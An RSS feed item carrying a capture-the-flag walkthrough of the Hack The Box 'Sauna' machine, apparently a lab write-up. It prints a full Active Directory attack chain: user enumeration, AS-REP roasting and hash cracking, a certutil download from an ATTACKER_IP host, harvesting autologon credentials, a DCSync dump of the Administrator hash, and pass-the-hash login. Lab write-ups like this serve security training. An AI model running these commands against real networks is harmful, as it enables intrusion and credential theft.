<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Iftikhar Huseynov</title>
    <description>The latest articles on DEV Community by Iftikhar Huseynov (@iftikhar_911).</description>
    <link>https://dev.to/iftikhar_911</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F4015093%2Ffdce4fe7-e0af-4ab7-b432-e015893f4b36.jpg</url>
      <title>DEV Community: Iftikhar Huseynov</title>
      <link>https://dev.to/iftikhar_911</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/iftikhar_911"/>
    <language>en</language>
    <item>
      <title>Sauna CTF HTB</title>
      <dc:creator>Iftikhar Huseynov</dc:creator>
      <pubDate>Sat, 04 Jul 2026 13:29:19 +0000</pubDate>
      <link>https://dev.to/iftikhar_911/sauna-ctf-htb-1lp0</link>
      <guid>https://dev.to/iftikhar_911/sauna-ctf-htb-1lp0</guid>
      <description>&lt;p&gt;Hi what’s up, welcome to my  page. Today we are going to solve Sauna ctf in Hack The box. This ctf is about Active Directory, which is very important.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Enumeration&lt;/strong&gt;&lt;br&gt;
&lt;code&gt;nmap -sV -sC 10.129.95.180&lt;br&gt;
Starting Nmap 7.98 ( https://nmap.org ) at 2026–07–03 13:16 -0400&lt;br&gt;
Nmap scan report for 10.129.95.180&lt;br&gt;
Host is up (0.21s latency).&lt;br&gt;
Not shown: 987 filtered tcp ports (no-response)&lt;br&gt;
PORT STATE SERVICE VERSION&lt;br&gt;
53/tcp open domain Simple DNS Plus&lt;br&gt;
80/tcp open http Microsoft IIS httpd 10.0&lt;br&gt;
|_http-server-header: Microsoft-IIS/10.0&lt;br&gt;
|_http-title: Egotistical Bank :: Home&lt;br&gt;
| http-methods: &lt;br&gt;
|_ Potentially risky methods: TRACE&lt;br&gt;
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026–07–04 00:16:58Z)&lt;br&gt;
135/tcp open msrpc Microsoft Windows RPC&lt;br&gt;
139/tcp open netbios-ssn Microsoft Windows netbios-ssn&lt;br&gt;
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)&lt;br&gt;
445/tcp open microsoft-ds?&lt;br&gt;
464/tcp open kpasswd5?&lt;br&gt;
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0&lt;br&gt;
636/tcp open tcpwrapped&lt;br&gt;
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL, Site: Default-First-Site-Name)&lt;br&gt;
3269/tcp open tcpwrapped&lt;br&gt;
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)&lt;br&gt;
|_http-server-header: Microsoft-HTTPAPI/2.0&lt;br&gt;
|_http-title: Not Found&lt;br&gt;
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows&lt;br&gt;
Host script results:&lt;br&gt;
| smb2-time: &lt;br&gt;
| date: 2026–07–04T00:17:20&lt;br&gt;
|_ start_date: N/A&lt;br&gt;
|_clock-skew: 6h59m50s&lt;br&gt;
| smb2-security-mode: &lt;br&gt;
| 3.1.1: &lt;br&gt;
|_ Message signing enabled and required&lt;/code&gt;&lt;br&gt;
As we can see, we have LDAP, evil-winrm, smb,http, rpc and many more ports.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;RPC port&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;rpcclient -U "" -N 10.129.95.180&lt;br&gt;
rpcclient $&amp;gt; enumdomusers&lt;br&gt;
result was NT_STATUS_ACCESS_DENIED&lt;br&gt;
rpcclient $&amp;gt; ^C&lt;/code&gt;&lt;br&gt;
We can’t use rpc port without authentication.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SMB port&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;`smbclient -L //10.129.95.180 
Password for [WORKGROUP\root]:
Anonymous login successful
Sharename Type Comment
 - - - - - - - - - - -
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.95.180 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 - no workgroup available`
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Same thing.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;LDAP&lt;/strong&gt;&lt;br&gt;
We have port 88 and 636. That’s why we can use ldapsearch for domain enumeration. Let’s start it.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;`ldapsearch -x -H ldap://10.129.95.180 -s base -b "" "(objectClass=*)" namingContexts
&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;extended LDIF
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;extended LDIF
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;LDAPv3
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;base &amp;lt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; with scope baseObject
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;filter: &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="nv"&gt;objectClass&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;*&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;requesting: namingContexts 
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="go"&gt;
&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="go"&gt;dn:
namingContexts: DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL

&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;search result
&lt;span class="go"&gt;search: 2
result: 0 Success

&lt;/span&gt;&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;numResponses: 2
&lt;span class="gp"&gt;#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;numEntries: 1&lt;span class="sb"&gt;`&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Domain Controller- egotistical-bank.local. And there are no interesting things.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;KERBEROS&lt;/strong&gt;&lt;br&gt;
Port 88 is active, we can use kerbrute tool for enumerate authenticated users. I’m using seclist for usernames but you can use any userlist txt.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;./kerbrute userenum -d egotistical-bank.local --dc 10.129.95.180 /home/kali/Downloads/SecLists/Usernames/xato-net-10-million-usernames.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,&amp;lt; /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/03/26 - Ronnie Flathers @ropnop

&lt;/span&gt;&lt;span class="gp"&gt;2026/07/03 13:31:29 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;Using KDC&lt;span class="o"&gt;(&lt;/span&gt;s&lt;span class="o"&gt;)&lt;/span&gt;:
&lt;span class="gp"&gt;2026/07/03 13:31:29 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;   &lt;/span&gt;10.129.95.180:88
&lt;span class="go"&gt;
&lt;/span&gt;&lt;span class="gp"&gt;2026/07/03 13:32:09 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       administrator@egotistical-bank.local
&lt;span class="gp"&gt;2026/07/03 13:35:45 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       hsmith@egotistical-bank.local
&lt;span class="gp"&gt;2026/07/03 13:36:30 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       Administrator@egotistical-bank.local
&lt;span class="gp"&gt;2026/07/03 13:38:47 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       fsmith@egotistical-bank.local
&lt;span class="gp"&gt;2026/07/03 13:58:42 &amp;gt;&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] VALID USERNAME:       Fsmith@egotistical-bank.local
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We found 3 users.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;AES-ROASTING&lt;/strong&gt;&lt;br&gt;
For these users, we can use impacket script called GetNPUusers.py. This script allowed us to find hashes.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt; GetNPUsers.py 'egotistical-bank.local/' -usersfile /home/kali/Downloads/sauna.txt -format hashcat -outputfile saunaasrep.txt -dc-ip 10.129.95.180
/usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  __import__('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'GetNPUsers.py')
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies 

[-] User hsmith doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt;krb5asrep&lt;span class="nv"&gt;$23$fsmith&lt;/span&gt;@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3&lt;span class="nv"&gt;$8049173e692157397d1c1b1e7927e5efa70cda45224dd92533ea77bad07b792a23bb1991e8b4934b7c0903d4ff5f38edf84206e1172d193c6b647a8fcf1caa4e58673f71f9fda5c26293e6af35756f36009895155b722118582ad330b121b4d42514ccf60a78e90d5d02c7c8b6de7d936f5f1b323eecdc8035d35ba67dbc0505c0eb0e464cc82dec821336513d18df4c8ed26f9d3e8a406dcc63d8393c71ed1bc6c9a2a05268e24cbd35b301bd6bec5dc61e16272d27d717a6fa64d5fa0e894583b169acf2956fa2caaa293db2d3f25e015477db979a6e797f224e0823c4b46394d20f91d9045ac5cbbc6cf64a312689d1bddd0b1de973357a0473e8259ffdfd&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We got fsmith’s hash.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Cracking the hash&lt;/strong&gt;&lt;br&gt;
Hashcat help us to crack this hash.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;hashcat -m 18200 saunaasrep.txt /usr/share/wordlists/rockyou.txt --force&lt;br&gt;
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:80fb2633f33d695682dc4fa9565b29f3$8049173e692157397d1c1b1e7927e5efa70cda45224dd92533ea77bad07b792a23bb1991e8b4934b7c0903d4ff5f38edf84206e1172d193c6b647a8fcf1caa4e58673f71f9fda5c26293e6af35756f36009895155b722118582ad330b121b4d42514ccf60a78e90d5d02c7c8b6de7d936f5f1b323eecdc8035d35ba67dbc0505c0eb0e464cc82dec821336513d18df4c8ed26f9d3e8a406dcc63d8393c71ed1bc6c9a2a05268e24cbd35b301bd6bec5dc61e16272d27d717a6fa64d5fa0e894583b169acf2956fa2caaa293db2d3f25e015477db979a6e797f224e0823c4b46394d20f91d9045ac5cbbc6cf64a312689d1bddd0b1de973357a0473e8259ffdfd:Thestrokes23&lt;/code&gt;&lt;br&gt;
We found fsmith’s password.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Gaining access to evil-winrm | PORT 5985&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="n"&gt;evil-winrm&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-i&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;ip&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-u&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;username&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;password&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;evil-winrm&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-i&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;10.129.95.180&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-u&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;fsmith&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;-p&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Thestrokes23&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="n"&gt;Evil-WinRM&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;shell&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;v3.9&lt;/span&gt;&lt;span class="w"&gt;



&lt;/span&gt;&lt;span class="n"&gt;Info:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Establishing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;connection&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;remote&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;endpoint&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Evil-WinRM&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\FSmith&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;cd&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Desktop&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Evil-WinRM&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\FSmith\Desktop&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;dir&lt;/span&gt;&lt;span class="w"&gt;


    &lt;/span&gt;&lt;span class="n"&gt;Directory:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\FSmith\Desktop&lt;/span&gt;&lt;span class="w"&gt;


&lt;/span&gt;&lt;span class="n"&gt;Mode&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;LastWriteTime&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="nx"&gt;Length&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Name&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="o"&gt;-------------&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="o"&gt;------&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;----&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nt"&gt;-ar&lt;/span&gt;&lt;span class="o"&gt;---&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="mi"&gt;7&lt;/span&gt;&lt;span class="n"&gt;/3/2026&lt;/span&gt;&lt;span class="w"&gt;   &lt;/span&gt;&lt;span class="nx"&gt;5:14&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;PM&lt;/span&gt;&lt;span class="w"&gt;             &lt;/span&gt;&lt;span class="nx"&gt;34&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;user.txt&lt;/span&gt;&lt;span class="w"&gt;



&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;Evil-WinRM&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;PS&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\FSmith\Desktop&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;user.txt&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;*******&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We got user.txt in desktop directory.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Privilege Escalation&lt;/strong&gt;&lt;br&gt;
Firstly,we should upload winpeas on the victim machine for privilege escalation methods.&lt;/p&gt;

&lt;p&gt;On attacker machine&lt;/p&gt;

&lt;p&gt;Make sure you are supposed to be in directory which has winpeas inside.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;python3 -m http.server 80&lt;/code&gt;&lt;br&gt;
On victim machine&lt;/p&gt;

&lt;p&gt;&lt;code&gt;certutil -urlcache -split -f http://&amp;lt;ATTACKER_IP&amp;gt;:80/winPEAS.exe winPEAS.exe&lt;/code&gt;&lt;br&gt;
We can run winpeas with .\winpeas.exe&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And there it is autologon user:svc_loanmanager&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;BloodHound&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Take a look at bloodhound,and we can understood what loanmanager can do. loanmanager have 3 permissions: GetChangesAll, DCSync, GetChanges.&lt;/p&gt;

&lt;p&gt;We use secretsdump for administrator hash.&lt;/p&gt;

&lt;p&gt;`&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;&lt;code&gt;console&lt;br&gt;
&lt;/code&gt;console&lt;br&gt;
`secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!&lt;a class="mentioned-user" href="https://dev.to/10"&gt;@10&lt;/a&gt;.129.95.180'&lt;br&gt;
/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See &lt;a href="https://setuptools.pypa.io/en/latest/pkg_resources.html" rel="noopener noreferrer"&gt;https://setuptools.pypa.io/en/latest/pkg_resources.html&lt;/a&gt;&lt;br&gt;
  &lt;strong&gt;import&lt;/strong&gt;('pkg_resources').run_script('impacket==0.14.0.dev0+20251120.95652.9c2d8b61', 'secretsdump.py')&lt;br&gt;
Impacket v0.14.0.dev0+20251120.95652.9c2d8b61 - Copyright Fortra, LLC and its affiliated companies &lt;/p&gt;

&lt;p&gt;[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied &lt;br&gt;
[&lt;em&gt;] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)&lt;br&gt;
[&lt;/em&gt;] Using the DRSUAPI method to get NTDS.DIT secrets&lt;br&gt;
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::&lt;br&gt;
`&lt;code&gt;&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&lt;/code&gt;`&lt;br&gt;
Hash has been found but firstly we should make sure that we can login with this hash. So we use crackmapexec for prove.&lt;/p&gt;

&lt;p&gt;&lt;code&gt;crackmapexec smb 10.129.95.180 -u 'Administrator' --hash aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e &lt;br&gt;
SMB         10.129.95.180   445    SAUNA            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL) (signing:True) (SMBv1:False)&lt;br&gt;
SMB         10.129.95.180   445    SAUNA            [+] EGOTISTICAL-BANK.LOCAL\Administrator:823452073d75b9d1cf70ebdf86c7f98e (Pwn3d!)&lt;br&gt;
&lt;/code&gt;Yeppp, we can use this hash for login!&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;ROOT FLAG&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;&amp;gt;&lt;/code&gt;impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e -dc-ip 10.129.95.180 &lt;a href="mailto:Administrator@10.129.95.180"&gt;Administrator@10.129.95.180&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;C:\Users&amp;gt; cd Administrator&lt;/p&gt;

&lt;p&gt;C:\Users\Administrator&amp;gt; cd Desktop&lt;/p&gt;

&lt;p&gt;C:\Users\Administrator\Desktop&amp;gt; dir&lt;br&gt;
 Volume in drive C has no label.&lt;br&gt;
 Volume Serial Number is 489C-D8FC&lt;br&gt;
 Directory of C:\Users\Administrator\Desktop&lt;br&gt;
07/14/2021  03:35 PM    &lt;/p&gt;          .&lt;br&gt;
07/14/2021  03:35 PM              ..&lt;br&gt;
07/03/2026  05:14 PM                34 root.txt&lt;br&gt;
               1 File(s)             34 bytes&lt;br&gt;
               2 Dir(s)   7,812,263,936 bytes free&lt;br&gt;
C:\Users\Administrator\Desktop&amp;gt; type root.txt&lt;br&gt;
*********``&lt;br&gt;
BINGOOO!!!! We got root flag. Stay safe and goodbye.
&lt;/blockquote&gt;

</description>
      <category>ctf</category>
      <category>redteam</category>
      <category>cybersecurity</category>
    </item>
  </channel>
</rss>
